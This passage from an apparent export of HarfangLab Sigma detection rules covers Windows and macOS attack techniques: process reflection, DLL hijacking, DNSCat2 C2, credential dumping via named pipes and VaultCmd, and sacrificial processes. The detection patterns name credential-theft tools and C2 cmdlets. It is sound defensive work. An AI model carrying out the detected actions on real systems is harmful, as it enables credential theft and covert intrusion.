"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627179Z",
"creation_date": "2026-03-23T11:45:34.627181Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627185Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/deepinstinct/Dirty-Vanity",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_possible_process_reflection.yml",
"content": "title: Possible Process Reflection via Windows Fork API\nid: ac406f1f-081b-4df3-b466-c4448d600409\ndescription: |\n Detects the reflection of a Windows process using the Windows fork API.\n Attackers can use process forking to inject processes with shellcodes while evading detection since the modified process is the cloned one.\n This technique can be used to hide malicious tasks inside legitimate processes as well as silently dump process memory for credential access and privilege escalation.\n It is recommended to check for malicious actions by the process created the remote thread and the injected one.\nreferences:\n - https://github.com/deepinstinct/Dirty-Vanity\n - https://attack.mitre.org/techniques/T1055/\ndate: 2023/01/04\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1055\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.ProcessInjection\nlogsource:\n product: windows\n category: remote_thread\ndetection:\n selection:\n StartFunction|contains: 'RtlCreateProcessReflection'\n\n # This is handled by the rule 00ff5814-36a0-4bb9-8426-599b30b414a1\n exclusion_lsass:\n TargetImage|endswith: '\\lsass.exe'\n\n exclusion_werfault:\n ProcessImage:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\syswow64\\WerFault.exe'\n ProcessParentCommandLine: '?:\\Windows\\System32\\svchost.exe -k WerSvcGroup'\n\n exclusion_rdrleakdiag:\n # C:\\WINDOWS\\system32\\RdrLeakDiag.exe -p 10768 -h 25 -tp 2 -cleanup -watson -unnamed -wait 240\n ProcessImage:\n - '?:\\Windows\\System32\\rdrleakdiag.exe'\n - '?:\\Windows\\syswow64\\rdrleakdiag.exe'\n ProcessCommandLine|contains|all:\n - 'RdrLeakDiag.exe'\n - '-cleanup'\n - '-watson'\n - '-unnamed'\n\n exclusion_thor_apt_scanner:\n ProcessOriginalFileName: 'thor64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Nextron Systems GmbH'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ac406f1f-081b-4df3-b466-c4448d600409",
"rule_name": "Possible Process Reflection via Windows Fork API",
"rule_description": "Detects the reflection of a Windows process using the Windows fork API.\nAttackers can use process forking to inject processes with shellcodes while evading detection since the modified process is the cloned one.\nThis technique can be used to hide malicious tasks inside legitimate processes as well as silently dump process memory for credential access and privilege escalation.\nIt is recommended to check for malicious actions by the process created the remote thread and the injected one.\n",
"rule_creation_date": "2023-01-04",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ac4f7776-e1b3-49ea-b9de-b82d05ad3952",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090981Z",
"creation_date": "2026-03-23T11:45:34.090983Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090987Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_checknetisolation.yml",
"content": "title: DLL Hijacking via checknetisolation.exe\nid: ac4f7776-e1b3-49ea-b9de-b82d05ad3952\ndescription: |\n Detects potential Windows DLL Hijacking via checknetisolation.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'checknetisolation.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DNSAPI.dll'\n - '\\FirewallAPI.dll'\n - '\\fwbase.dll'\n - '\\fwpuclnt.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ac4f7776-e1b3-49ea-b9de-b82d05ad3952",
"rule_name": "DLL Hijacking via checknetisolation.exe",
"rule_description": "Detects potential Windows DLL Hijacking via checknetisolation.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "aca3c3d1-7e17-432a-a8f8-38f1719a61a4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624571Z",
"creation_date": "2026-03-23T11:45:34.624573Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624577Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/iagox86/dnscat2",
"https://github.com/lukebaggett/dnscat2-powershell",
"https://attack.mitre.org/techniques/T1071/004/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1071_004_dnscat2_powershell_c2.yml",
"content": "title: DNSCat2 PowerShell Cmdlet Executed\nid: aca3c3d1-7e17-432a-a8f8-38f1719a61a4\ndescription: |\n Detects the usage of DNSCat2 PowerShell client for command and control communication over DNS protocol.\n DNSCat2 is a C2 tool that tunnels data over DNS queries and responses, often used by attackers to bypass network security controls.\n The PowerShell implementation contains distinctive strings, function names, and behavior patterns related to DNS query crafting and data exfiltration.\n It is recommended to investigate the process tree, analyze network DNS traffic for unusual patterns, and check for related malicious activity on the compromised system.\nreferences:\n - https://github.com/iagox86/dnscat2\n - https://github.com/lukebaggett/dnscat2-powershell\n - https://attack.mitre.org/techniques/T1071/004/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2025/11/07\nmodified: 2025/12/08\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.004\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.DNSCat2\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n ScriptBlockText|contains:\n - 'Get-Dnscat2StreamKeys'\n - 'Get-Dnscat2PacketSignature'\n - 'Get-Dnscat2PeerAuthStrings'\n - 'Get-Dnscat2ShortAuthString'\n - 'Get-NextDnscat2Data'\n - 'New-Dnscat2SYN'\n - 'New-Dnscat2MSG'\n - 'New-Dnscat2FIN'\n - 'New-Dnscat2ENC'\n - 'New-Dnscat2Tunnel'\n\n condition: selection\nlevel: high\nconfidence: strong\n\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "aca3c3d1-7e17-432a-a8f8-38f1719a61a4",
"rule_name": "DNSCat2 PowerShell Cmdlet Executed",
"rule_description": "Detects the usage of DNSCat2 PowerShell client for command and control communication over DNS protocol.\nDNSCat2 is a C2 tool that tunnels data over DNS queries and responses, often used by attackers to bypass network security controls.\nThe PowerShell implementation contains distinctive strings, function names, and behavior patterns related to DNS query crafting and data exfiltration.\nIt is recommended to investigate the process tree, analyze network DNS traffic for unusual patterns, and check for related malicious activity on the compromised system.\n",
"rule_creation_date": "2025-11-07",
"rule_modified_date": "2025-12-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1071.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ace4c145-1aaf-42ed-bf5c-227ceb652b03",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078225Z",
"creation_date": "2026-03-23T11:45:34.078227Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078232Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment?next_slideshow=82266109",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1003_credential_dumping_named_pipes_connection.yml",
"content": "title: Named Pipe Connected Associated with Credential Dumping Tools\nid: ace4c145-1aaf-42ed-bf5c-227ceb652b03\ndescription: |\n Detects a suspicious attempt to dump credentials in Windows using tools that connect to specific named pipes.\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n Is is recommended to analyze both the transmitting and receiving processes and to look for other suspicious activities on the host.\nreferences:\n - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment?next_slideshow=82266109\n - https://attack.mitre.org/techniques/T1003/\ndate: 2022/07/11\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: named_pipe_connection\ndetection:\n selection:\n PipeName|contains:\n - '\\lsadump'\n - '\\cachedump'\n - '\\wceservicepipe'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ace4c145-1aaf-42ed-bf5c-227ceb652b03",
"rule_name": "Named Pipe Connected Associated with Credential Dumping Tools",
"rule_description": "Detects a suspicious attempt to dump credentials in Windows using tools that connect to specific named pipes.\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIs is recommended to analyze both the transmitting and receiving processes and to look for other suspicious activities on the host.\n",
"rule_creation_date": "2022-07-11",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ace56597-37bb-4f26-8d50-356464cf6c56",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084665Z",
"creation_date": "2026-03-23T11:45:34.084667Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084671Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_csc.yml",
"content": "title: Csc.exe Sacrificial Process Spawned\nid: ace56597-37bb-4f26-8d50-356464cf6c56\ndescription: |\n Detects the suspicious execution of the legitimate Windows binary csc.exe, spawned without arguments and in an abnormal execution context.\n This can mean that the binary is being used as sacrificial or hollowed process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n This technique is used by, for instance, by the Vidar malware.\n It is recommended to investigate the parent process performing this action and the destination IP address of the csc.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/05/13\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProcessTampering\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Windows\\Microsoft.NET\\Framework\\v*\\csc.exe'\n filter_ngen:\n CommandLine: '?:\\WINDOWS\\Microsoft.NET\\Framework\\v*\\ngen.exe * *\\csc.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ace56597-37bb-4f26-8d50-356464cf6c56",
"rule_name": "Csc.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate Windows binary csc.exe, spawned without arguments and in an abnormal execution context.\nThis can mean that the binary is being used as sacrificial or hollowed process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThis technique is used by, for instance, by the Vidar malware.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the csc.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-05-13",
"rule_modified_date": "2025-01-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "acf3147a-d635-482b-a2bc-e980842482cd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623936Z",
"creation_date": "2026-03-23T11:45:34.623939Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623943Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1189_stealer_curl_url.yml",
"content": "title: File Downloaded via cURL Related to Stealer Activity\nid: acf3147a-d635-482b-a2bc-e980842482cd\ndescription: |\n Detects the usage of cURL to download a file from a suspicious URL.\n Attackers use this technique to deliver and execute malicious payloads through a fake installer campaign.\n It is recommended to analyze the downloaded file to determine whether its content is malicious.\nreferences:\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2026/03/18\nmodified: 2026/03/19\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1189\n - attack.command_and_control\n - attack.t1105\n - attack.t1071.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Curl\n - classification.macOS.Behavior.FileDownload\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n ProcessImage: '/usr/bin/curl'\n ProcessCommandLine|contains: '/curl/'\n\n exclusion_homebrew:\n ProcessCommandLine|contains: 'https://ghcr.io/v2/homebrew/core/curl/'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "acf3147a-d635-482b-a2bc-e980842482cd",
"rule_name": "File Downloaded via cURL Related to Stealer Activity",
"rule_description": "Detects the usage of cURL to download a file from a suspicious URL.\nAttackers use this technique to deliver and execute malicious payloads through a fake installer campaign.\nIt is recommended to analyze the downloaded file to determine whether its content is malicious.\n",
"rule_creation_date": "2026-03-18",
"rule_modified_date": "2026-03-19",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1105",
"attack.t1189"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ad530185-1f9d-422a-bb74-7bdcda199b74",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078089Z",
"creation_date": "2026-03-23T11:45:34.078091Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078096Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://web.archive.org/web/20201004080456/https://rastamouse.me/blog/rdp-jump-boxes/",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1003_credentials_listing_using_vaultcmd.yml",
"content": "title: Credentials Listed via Vaultcmd\nid: ad530185-1f9d-422a-bb74-7bdcda199b74\ndescription: |\n Detects the execution of VaultCmd to list credentials from the Windows Credential Manager.\n Attackers can use this technique to find credentials to dump for future credential access.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://web.archive.org/web/20201004080456/https://rastamouse.me/blog/rdp-jump-boxes/\n - https://attack.mitre.org/techniques/T1003/\ndate: 2022/11/17\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1555.004\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - OriginalFileName: 'vaultcmd.exe'\n - Image|endswith: '\\vaultcmd.exe'\n\n selection_action:\n CommandLine|contains:\n - ' -list'\n - ' /list'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ad530185-1f9d-422a-bb74-7bdcda199b74",
"rule_name": "Credentials Listed via Vaultcmd",
"rule_description": "Detects the execution of VaultCmd to list credentials from the Windows Credential Manager.\nAttackers can use this technique to find credentials to dump for future credential access.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-11-17",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1555.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ad53570b-a715-454b-bd80-fd165d3958d3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085226Z",
"creation_date": "2026-03-23T11:45:34.085228Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085232Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_mmgaserver.yml",
"content": "title: Mmgaserver.exe Sacrificial Process Spawned\nid: ad53570b-a715-454b-bd80-fd165d3958d3\ndescription: |\n Detects the suspicious execution of the legitimate mmgaserver.exe Windows binary, spawned without arguments and in an abnormal execution context.\n This can mean that the binary is being used as sacrificial or hollowed process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n It is recommended to investigate the parent process performing this action and the destination IP address of the mmgaserver.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/05/13\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine:\n - '?:\\WINDOWS\\SysWOW64\\mmgaserver.exe'\n - '?:\\WINDOWS\\System32\\mmgaserver.exe'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ad53570b-a715-454b-bd80-fd165d3958d3",
"rule_name": "Mmgaserver.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate mmgaserver.exe Windows binary, spawned without arguments and in an abnormal execution context.\nThis can mean that the binary is being used as sacrificial or hollowed process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the mmgaserver.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-05-13",
"rule_modified_date": "2025-02-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ad688ec6-d5b4-4404-bd3c-dfd831dd35a1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096270Z",
"creation_date": "2026-03-23T11:45:34.096272Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096276Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://www.secureworks.com/research/shadowpad-malware-analysis",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_aitstatic.yml",
"content": "title: DLL Hijacking via aitstatic.exe\nid: ad688ec6-d5b4-4404-bd3c-dfd831dd35a1\ndescription: |\n Detects potential Windows DLL Hijacking via aitstatic.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://www.secureworks.com/research/shadowpad-malware-analysis\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'aitstatic.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\mscoree.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\Microsoft.NET\\Framework\\v*\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n 